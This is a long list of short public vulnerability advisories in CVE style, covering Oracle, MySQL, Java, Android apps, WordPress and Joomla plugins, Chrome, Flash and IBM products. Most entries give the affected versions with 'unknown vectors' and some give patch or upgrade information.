Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11 and 6 through Update 38 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than other CVEs listed in the February 2013 CPU.  NOTE: the previous information is from the February 2013 CPU. Oracle has not commented on claims from a third party that the issue is due to an interaction error in between the JRE plug-in for WebKit-based browsers and the Javascript engine, which allows remote attackers to execute arbitrary code by modifying DOM nodes that contain applet elements in a way that triggers an incorrect reference count and a use after free.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, and 6 Update 35 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2012-3159.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier and 6 Update 35 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, 5.0 Update 36 and earlier, and 1.4.2_38 and earlier; and JavaFX 2.2 and earlier; allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
Use-after-free vulnerability in the XML parser in Google Chrome before 18.0.1025.168 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Unspecified vulnerability in the NetFront Life Browser (com.access_company.android.nflifebrowser.lite) application 2.2.0 and 2.3.0 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the WaliSMS CN (cn.com.wali.walisms) application 2.9.2 and 3.7.0 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the Message Forwarder (com.gmail.zbnetium) application 1.12.20110409.1 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the TouchPal Contacts (com.cootek.smartdialer) application 3.3.1 and 4.0.1 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the Textdroid (com.app.android.textdroid) application 2.5.2 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the Pansi SMS (com.pansi.msg) application 1.97, 2.01, and 2.07 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the AContact (com.movester.quickcontact) application 1.8.2 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the UCMobile BloveStorm (com.blovestorm) application 2.2.0 and 3.2.1 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the Cnectd (mci.cnectd) application 3.1.0 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the KKtalk (com.kkliaotian.android) application 4.0.0 and 4.1.5 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the YagattaTalk Messenger (com.iskoot.yagatta.yagattatalk) application 1.00.01.08 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the Youni SMS (com.snda.youni) application 2.1.0c and 2.1.0d for Android has unknown impact and attack vectors.
Multiple unspecified vulnerabilities in Google Chrome before 17.0.963.60 on the Acer AC700, Samsung Series 5, and Cr-48 Chromebook platforms have unknown impact and attack vectors.
Unspecified vulnerability in the Tiny Password (com.tinycouch.android.freepassword) application 1.64 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the App Lock (com.cc.applock) application 1.7.5 and 1.7.6 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the GO Message Widget (com.gau.go.launcherex.gowidget.smswidget) application 1.9, 2.1, and 2.3 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the GO Bookmark Widget (com.gau.go.launcherex.gowidget.bookmark) application 1.1 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the GO Note Widget (com.gau.go.launcherex.gowidget.notewidget) application 1.5 and 1.9 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the Dolphin Browser Mini (com.dolphin.browser) application 2.2 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the Dolphin Browser CN (com.dolphin.browser.cn) application 6.3.1 and 7.2.1 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the QianXun YingShi (com.qianxun.yingshi) application 1.2.3 and 1.3.4 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the CamScanner (com.intsig.camscanner) application 1.2.2.20110823 and 1.3.2.20120116 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the U+Box 2.0 Pad (lg.uplusbox.pad) application 2.0.8.4 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the U+Box 2.0 (lg.uplusbox) application 2.0.2 and 2.0.8.4 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the GO WeiboWidget (com.gau.go.launcherex.gowidget.weibowidget) application 2.4 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the GO QQWeiboWidget (com.gau.go.launcherex.gowidget.qqweibowidget) application 1.2 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the GO FBWidget (com.gau.go.launcherex.gowidget.fbwidget) application 1.9 and 2.1 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the GO TwiWidget (com.gau.go.launcherex.gowidget.twitterwidget) application 1.7 and 2.1 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the GO Email Widget (com.gau.go.launcherex.gowidget.emailwidget) application 1.3.1, 1.8, and 1.81 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the GO SMS Pro (com.jb.gosms) application 3.72, 4.10, and 4.35 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the Dolphin Browser HD (mobi.mgeek.TunnyBrowser) application 6.2.0, 7.2.1, 7.3.0, and 7.4.0 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the mOffice - Outlook sync (com.innov8tion.isharesync) application 3.1 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the Miso (com.bazaarlabs.miso) application 2.2 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the Di Long Weibo (com.icekirin.weibos) application 1.9.9 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the XiXunTianTian (com.xixun.tiantian) application 0.6.2 beta for Android has unknown impact and attack vectors.
Unspecified vulnerability in the RealTalk (com.tmsmanager.tms) application A.0.9.250 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the YouMail Visual Voicemail Plus (com.youmail.android.vvm) application 2.0.45 and 2.1.43 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the NetEase WeiboHD (com.netease.wbhd) application 1.0.0 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the NetEase Pmail (com.netease.rpmms) application 0.5.0 and 0.5.2 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the NetEase Reader (com.netease.pris) application 1.1.2 and 1.2.0 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the Youdao Dictionary (com.youdao.dict) application 1.6.1, 2.0.1(2), and 3.0.0(1) for Android has unknown impact and attack vectors.
Unspecified vulnerability in the NetEase CloudAlbum (com.netease.cloudalbum) application 2.0.0 and 2.2.0 for Android has unknown impact and attack vectors.
Unspecified vulnerability in the NetEaseWeibo (com.netease.wb) application 1.2.1 and 1.2.2 for Android has unknown impact and attack vectors.
The Fibre Channel over IP (FCIP) implementation in Cisco MDS NX-OS 4.2 and 5.2 on MDS 9000 series switches allows remote attackers to cause a denial of service (module reload) via a crafted FCIP header, aka Bug ID CSCtn93151.
Cross-site request forgery (CSRF) vulnerability in Advantech/BroadWin WebAccess 7.0 allows remote authenticated users to hijack the authentication of unspecified victims via unknown vectors.  NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-0235.
Unspecified vulnerability in the BE User Switch (beuserswitch) extension 0.0.1 for TYPO3 allows remote attackers to obtain sensitive information via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in the Terminal PHP Shell (terminal) extension 0.3.2 and earlier for TYPO3 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in the Webservices for TYPO3 (typo3_webservice) extension before 0.3.8 for TYPO3 allows remote authenticated users to execute arbitrary code via unknown vectors.
SQL injection vulnerability in the WP-RecentComments plugin 2.0.7 for WordPress allows remote attackers to execute arbitrary SQL commands via the id parameter in an rc-content action to index.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in the Euroling SiteSeeker module 3.x before 3.4.5 for EPiServer allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
A vulnerability was found in BestWebSoft Portfolio Plugin up to 2.04 on WordPress. It has been classified as problematic. This affects an unknown part. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. Upgrading to version 2.06 is able to address this issue. The patch is named 68af950330c3202a706f0ae9bbb52ceaa17dda9d. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248955.
A vulnerability classified as problematic has been found in Halulu simple-download-button-shortcode Plugin 1.0 on WordPress. Affected is an unknown function of the file simple-download-button_dl.php of the component Download Handler. The manipulation of the argument file leads to information disclosure. It is possible to launch the attack remotely. Upgrading to version 1.1 is able to address this issue. The patch is identified as e648a8706818297cf02a665ae0bae1c069dea5f1. It is recommended to upgrade the affected component. VDB-242190 is the identifier assigned to this vulnerability.
A vulnerability was found in Kau-Boy Backend Localization Plugin up to 1.6.1 on WordPress. It has been rated as problematic. This issue affects some unknown processing of the file backend_localization.php. The manipulation leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 2.0 is able to address this issue. The patch is named 43dc96defd7944da12ff116476a6890acd7dd24b. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-227231.
A vulnerability, which was classified as critical, has been found in uakfdotb oneapp. This issue affects some unknown processing. The manipulation leads to sql injection. The attack may be initiated remotely. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The patch is named 5413ac804f1b09f9decc46a6c37b08352c49669c. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-221483.
A vulnerability was found in madgicweb BuddyStream Plugin up to 3.2.7 on WordPress. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file ShareBox.php. The manipulation of the argument content/link/shares leads to cross site scripting. The attack can be launched remotely. Upgrading to version 3.2.8 is able to address this issue. The patch is named 7d5b9a89a27711aad76fd55ab4cc4185b545a1d0. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-221479.
A vulnerability classified as critical has been found in ale7714 sigeprosi. This affects an unknown part. The manipulation leads to sql injection. The identifier of the patch is 5291886f6c992316407c376145d331169c55f25b. It is recommended to apply a patch to fix this issue. The identifier VDB-218493 was assigned to this vulnerability.
A vulnerability has been found in manikandan170890 php-form-builder-class and classified as problematic. Affected by this vulnerability is an unknown functionality of the file PFBC/Element/Textarea.php of the component Textarea Handler. The manipulation of the argument value leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The patch is named 74897993818d826595fd5857038e6703456a594a. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218155.
A vulnerability, which was classified as problematic, has been found in ahmyi RivetTracker. This issue affects some unknown processing. The manipulation of the argument $_SERVER['PHP_SELF'] leads to cross site scripting. The attack may be initiated remotely. The patch is named f053c5cc2bc44269b0496b5f275e349928a92ef9. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217271.
A Memory Corruption Vulnerability exists in NVIDIA Graphics Drivers 29549 due to an unknown function in the file proc/driver/nvidia/registry.
Unspecified vulnerability in Hitachi COBOL2002 Net Developer, Net Server Suite, and Net Client Suite 01-00, 01-01 through 01-01-/D, 01-02 through 01-02-/F, 01-03 through 01-03-/F, 02-00 through 02-00-/D, 02-01 through 02-01-/C, and possibly other versions before 02-01-/D allows remote attackers to execute arbitrary code via unknown attack vectors.
Unspecified vulnerability in Joomla! 1.7.x before 1.7.5 allows attackers to read the error log via unknown vectors.
Unspecified vulnerability in Joomla! 1.7.x before 1.7.5 and 2.5.x before 2.5.1 allows attackers to obtain sensitive information via unknown vectors related to "administrator."
Unspecified vulnerability in Joomla! 1.6.x and 1.7.x before 1.7.4 allows remote attackers to obtain sensitive information via unknown vectors, a different vulnerability than CVE-2012-0819.
Unspecified vulnerability in Joomla! 1.6.x and 1.7.x before 1.7.4 allows remote attackers to obtain sensitive information via unknown vectors, a different vulnerability than CVE-2012-0821.
An unspecified ActiveX control in Adobe Flash Player before 10.3.183.18 and 11.x before 11.2.202.228, and AIR before 3.2.0.2070, on Windows does not properly perform URL security domain checking, which allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors.
Adobe Flash Player before 11.2.202.229 in Google Chrome before 18.0.1025.151 allow attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors, a different vulnerability than CVE-2012-0724.
Adobe Flash Player before 11.2.202.229 in Google Chrome before 18.0.1025.151 allow attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors, a different vulnerability than CVE-2012-0725.
Cross-site request forgery (CSRF) vulnerability in IBM Maximo Asset Management 6.2 through 7.5, as used in SmartCloud Control Desk, Tivoli Asset Management for IT, Tivoli Service Request Manager, Maximo Service Desk, and Change and Configuration Management Database (CCMDB), allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in the XML feature in IBM DB2 9.7 before FP6 on Linux, UNIX, and Windows allows remote authenticated users to read arbitrary XML files via unknown vectors.
InfoSphere Import Export Manager in InfoSphere Information Server MetaBrokers &amp; Bridges (MBB) in IBM InfoSphere Information Server 8.1, 8.5 before FP3, 8.7, and 9.1 does not validate unspecified input data, which allows remote authenticated users to execute arbitrary commands via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 17.0.963.27 on the Acer AC700, Samsung Series 5, and Cr-48 Chromebook platforms have unknown impact and attack vectors.
Unspecified vulnerability in the Siebel Clinical component in Oracle Industry Applications 7.7, 7.8, 8.0.0.x, 8.1.1.x, and 8.2.2.x allows remote authenticated users to affect integrity via unknown vectors related to Web UI, a different vulnerability than CVE-2012-1674.
Unspecified vulnerability in the Oracle Agile PLM for Process component in Oracle Supply Chain Products Suite 5.2.2, 6.0.0, and 6.1.1 allows remote attackers to affect integrity via unknown vectors related to Supplier Portal.
Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking component in Oracle Financial Services Software 10.0.0 through 10.5.0 and 11.0.0 through 11.4.0 allows remote authenticated users to affect confidentiality via unknown vectors related to Core.
Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking component in Oracle Financial Services Software 10.0.0 through 10.5.0 and 11.0.0 through 11.4.0 allows remote authenticated users to affect availability via unknown vectors related to Core.
Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking component in Oracle Financial Services Software 6.0.1 and 6.2.0 allows remote authenticated users to affect integrity via unknown vectors related to Core-Help.
Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking component in Oracle Financial Services Software 10.0.0 through 10.5.0 and 11.0.0 through 11.2.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Core.
Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows remote authenticated users to affect availability via unknown vectors.
Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking component in Oracle Financial Services Software 10.0.0 through 10.5.0 and 11.0.0 through 11.4.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Core.
Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier and 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking component in Oracle Financial Services Software 10.0.0 through 10.5.0 and 11.0.0 through 11.4.0 allows remote authenticated users to affect integrity via unknown vectors related to Core, a different vulnerability than CVE-2012-0544.
Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 allows local users to affect availability via unknown vectors related to Libraries/Libc.
Unspecified vulnerability Oracle Sun Solaris 10 allows local users to affect confidentiality and integrity via unknown vectors related to Install/smpatch.
Unspecified vulnerability in Oracle Sun Solaris 8, 9, and 10 allows local users to affect confidentiality via unknown vectors related to Utility/fdformat.
Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking component in Oracle Financial Services Software 10.0.0 through 10.5.0 and 11.0.0 through 11.2.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Core, a different vulnerability than CVE-2012-0545 and CVE-2012-0546.
Unspecified vulnerability in the Oracle Agile component in Oracle Supply Chain Products Suite 5.2.2, 6.0.0, and 6.1.1 allows remote attackers to affect integrity via unknown vectors related to Supplier Portal.
Unspecified vulnerability in the Oracle Agile component in Oracle Supply Chain Products Suite 5.2.2, 6.0.0, and 6.1.1 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Install.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.50 and 8.51 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Query.
Unspecified vulnerability in Oracle Solaris 9, 10, and 11 allows local users to affect availability via unknown vectors related to Kerberos/klist.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft Products 9.1 allows remote authenticated users to affect confidentiality via unknown vectors related to Candidate Gateway, a different vulnerability than CVE-2012-1748.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.50, 8.51, and 8.52 allows remote attackers to affect integrity via unknown vectors related to Portal.
Unspecified vulnerability in the PeopleSoft Enterprise SCM component in Oracle PeopleSoft Products 9.0 and 9.1 allows remote authenticated users to affect confidentiality via unknown vectors related to Billing.
Unspecified vulnerability in the Primavera P6 Enterprise Project Portfolio Management component in Oracle Primavera Products Suite 6.2.1, 8.0, 8.1, and 8.2 allows remote attackers to affect integrity via unknown vectors related to Web application.
Unspecified vulnerability in the Oracle Spatial component in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE 7 update 4 and earlier and 6 update 32 and earlier, and the GlassFish Enterprise Server component in Oracle Sun Products Suite GlassFish Enterprise Server 3.1.1, allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Container or Deployment.
Unspecified vulnerability in the GlassFish Enterprise Server component in Oracle Sun Products Suite GlassFish Enterprise Server 3.1.1 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Web Container.
Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking component in Oracle Financial Services Software 10.0.0 through 10.5.0 and 11.0.0 through 11.2.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Core, a different vulnerability than CVE-2012-0545 and CVE-2012-0567.
Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking component in Oracle Financial Services Software 10.0.0 through 10.5.0 and 11.0.0 through 11.2.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Core, a different vulnerability than CVE-2012-0546 and CVE-2012-0567.
Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking component in Oracle Financial Services Software 10.0.0 through 10.5.0 and 11.0.0 through 11.4.0 allows remote authenticated users to affect integrity via unknown vectors related to Core, a different vulnerability than CVE-2012-0571.
Unspecified vulnerability in the BI Publisher (formerly XML Publisher) component in Oracle Fusion Middleware 10.1.3.4.1 and 10.1.3.4.2 allows remote attackers to affect integrity via unknown vectors related to Administration.
Unspecified vulnerability in the Oracle iStore component in Oracle E-Business Suite 11.5.10.2, 12.0.4, 12.0.6, 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect integrity via unknown vectors related to Runtime Catalog.
Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking component in Oracle Financial Services Software 5.0.2, 5.3.0 through 5.3.4, 6.0.1, and 6.2.0 allows remote authenticated users to affect confidentiality via unknown vectors related to Core-My Services.
Unspecified vulnerability in Oracle Sun Solaris 8, 9, and 10 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to (1) bsmconv and (2) bsmunconv.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.50, 8.51, and 8.52 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Search.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft Products 8.9 through Bundle #26 allows remote authenticated users to affect confidentiality via unknown vectors related to eCompensation.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 12.0.6 and 12.1.3 allows remote attackers to affect confidentiality via unknown vectors related to Change Password Page.
Unspecified vulnerability in the RDBMS Core component in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3 allows remote authenticated users to affect integrity via unknown vectors related to Create Session.
Unspecified vulnerability in the PeopleSoft Enterprise FCSM component in Oracle PeopleSoft Products 9.0 and 9.1 allows remote authenticated users to affect confidentiality via unknown vectors related to Receivables.
Unspecified vulnerability in the Identity Manager component in Oracle Fusion Middleware 11.1.1.3 and 11.1.1.5 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to User Config Management.
Unspecified vulnerability in the PeopleSoft Enterprise Portal component in Oracle PeopleSoft Products 9.1 allows remote authenticated users to affect integrity via unknown vectors related to Enterprise Portal.
Unspecified vulnerability in the PeopleSoft Enterprise SCM component in Oracle PeopleSoft Products 9.0 and 9.1 allows remote authenticated users to affect integrity via unknown vectors related to eProcurement.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.51 allows remote authenticated users to affect integrity via unknown vectors related to core.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, and 11.1.0.7, and Oracle Enterprise Manager Grid Control, allows remote attackers to affect confidentiality and integrity via unknown vectors related to Security Framework.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3, and Oracle Enterprise Manager Grid Control 10.2.0.5, allows remote attackers to affect integrity via unknown vectors related to Schema Management, a different vulnerability than CVE-2012-0526.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3, and Oracle Enterprise Manager Grid Control 10.2.0.5, allows remote attackers to affect integrity via unknown vectors related to Schema Management, a different vulnerability than CVE-2012-0527.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Database Server 11.1.0.7, 11.2.0.2, and 11.2.0.3, and Oracle Enterprise Manager Grid Control 10.2.0.5 and 11.1.0.1, allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Enterprise Config Management.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.50, 8.51, and 8.52 allows local users to affect confidentiality and integrity via unknown vectors related to File Processing.
Unspecified vulnerability in the Oracle Grid Engine component in Oracle Sun Products Suite 6.1 and 6.2 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to sgepasswd.
Unspecified vulnerability in the Oracle JDeveloper component in Oracle Fusion Middleware 10.1.3.5 allows remote attackers to affect integrity via unknown vectors related to Java Business Objects.
Unspecified vulnerability in the PeopleSoft Enterprise HCM component in Oracle PeopleSoft Products 9.1 Bundle #9 allows remote authenticated users to affect confidentiality via unknown vectors related to Human Resources.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, and 11.2.0.2, and in Oracle Enterprise Manager Grid Control 10.2.0.5 and 11.1.0.1, allows remote attackers to affect integrity via unknown vectors related to Security Framework.
Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 11.2.0.2, when running on Windows, allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle Application Server Single Sign-On component in Oracle Fusion Middleware 10.1.4.3.0 allows remote attackers to affect integrity via unknown vectors related to Redirects, a different vulnerability than CVE-2012-3175.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft Products 9.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to eCompensation Manager Desktop.
Unspecified vulnerability in the Oracle iPlanet Web Server component in Oracle Sun Products Suite 7.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Administration Console.
Unspecified vulnerability in the Identity Manager Connector component in Oracle Fusion Middleware 9.1.0.4 allows remote authenticated users to affect integrity via unknown vectors.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Database Server 11.1.0.7 and 11.2.0.2 and Oracle Enterprise Manager Grid Control allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Enterprise Config Management.
Unspecified vulnerability in the OCI component in Oracle Database Server 10.2.0.3, 10.2.0.4, and 11.1.0.7 allows remote attackers to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, and 11.1.0.7 allows remote attackers to affect integrity and availability via unknown vectors.
Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking component in Oracle Financial Services Software 5.0.2 and 5.3.0 through 5.3.4 allows remote authenticated users to affect integrity via unknown vectors related to Core-Base.
Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX, 1.3.0 and earlier, and 1.2.2 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, and 5.0 Update 33 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Concurrency.  NOTE: the previous information was obtained from the February 2012 Oracle CPU. Oracle has not commented on claims from a downstream vendor and third party researchers that this issue occurs because the AtomicReferenceArray class implementation does not ensure that the array is of the Object[] type, which allows attackers to cause a denial of service (JVM crash) or bypass Java sandbox restrictions.  NOTE: this issue was originally mapped to CVE-2011-3571, but that identifier was already assigned to a different issue.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, 5.0 Update 33 and earlier, and 1.4.2_35 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect integrity via unknown vectors related to CORBA.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, 5 Update 33 and earlier, and 1.4.2_35 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Serialization.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, and 6 Update 30 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Install and the Java Update mechanism.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, and 5.0 Update 33 and earlier allows remote attackers to affect availability via unknown vectors.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, and JavaFX 2.0.2 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, 5.0 Update 33 and earlier, and 1.4.2_35 and earlier; and JavaFX 2.0.2 and earlier; allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, and 5.0 Update 33 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, and 6 Update 30 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0486, CVE-2012-0487, CVE-2012-0488, CVE-2012-0489, CVE-2012-0491, and CVE-2012-0493.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows local users to affect availability via unknown vectors.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0486, CVE-2012-0487, CVE-2012-0488, CVE-2012-0489, CVE-2012-0491, and CVE-2012-0495.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0119, CVE-2012-0120, and CVE-2012-0485.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0486, CVE-2012-0487, CVE-2012-0488, CVE-2012-0489, CVE-2012-0493, and CVE-2012-0495.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows remote authenticated users to affect availability via unknown vectors.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0486, CVE-2012-0487, CVE-2012-0488, CVE-2012-0491, CVE-2012-0493, and CVE-2012-0495.
